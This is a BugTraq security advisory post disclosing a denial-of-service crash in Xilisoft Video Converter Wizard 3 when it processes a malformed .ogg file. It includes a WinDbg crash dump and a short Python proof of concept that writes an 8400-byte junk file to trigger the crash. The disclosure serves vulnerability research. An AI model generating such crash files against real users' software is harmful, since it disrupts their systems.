BugTraq
Xilisoft Video Converter Wizard 3 ogg file processing DoS Aug 16 2010 02:29PM
praveen_recker sify com
ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll

ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll

(26c8.1818): Access violation - code c0000005 (!!! second chance !!!)

eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20

eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246

*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll -

avformat!yuv4mpeg_init+0x6e06:

0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??

Missing image name, possible paged-out or corrupt data.

Missing image name, possible paged-out or corrupt data.

Missing image name, possible paged-out or corrupt data.

0:000> g

(26c8.1818): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20

eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246

avformat!yuv4mpeg_init+0x6e06:

0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??

0:000> kv

ChildEBP RetAddr Args to Child

WARNING: Stack unwind information not available. Following frames may be wrong.

0012d860 003540ea 0012d8a0 0199ffb0 0012d8a0 avformat!yuv4mpeg_init+0x6e06

00000000 00000000 00000000 00000000 00000000 avformat!nut_init+0x42a

0:000> d eip

0036a9ba 8a 68 11 8a 50 0f 8a 48-10 c1 e1 08 0b ca 33 d2 .h..P..H......3.

0036a9ca 8a 50 0e c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............

0036a9da 90 90 90 90 90 90 8b 44-24 04 33 c9 33 d2 8b 00 .......D$.3.3...

0036a9ea 8a 68 15 8a 50 13 8a 48-14 c1 e1 08 0b ca 33 d2 .h..P..H......3.

0036a9fa 8a 50 12 c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............

0036aa0a 90 90 90 90 90 90 56 8b-74 24 08 85 f6 74 54 57 ......V.t$...tTW

0036aa1a b9 5a 00 00 00 33 c0 8b-fe f3 ab 68 00 40 00 00 .Z...3.....h.@..

0036aa2a c7 46 04 00 40 00 00 e8-18 11 00 00 68 00 10 00 .F.. (at) .......h. (dot) . [email concealed]

################PoC Start##############################################

print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"

#Download from

# http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=
xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/w
izard.html/__xilisoft-video-converter__d1

#http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

buff = "D" * 8400

try:

oggfile = open("XilVC_ogg_crash.ogg","w")

oggfile.write(buff)

oggfile.close()

print "[+]Successfully created ogg file\n"

print "[+]Coded by Praveen Darshanam\n"

except:

print "[+]Cannot create File\n"

################PoC End################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus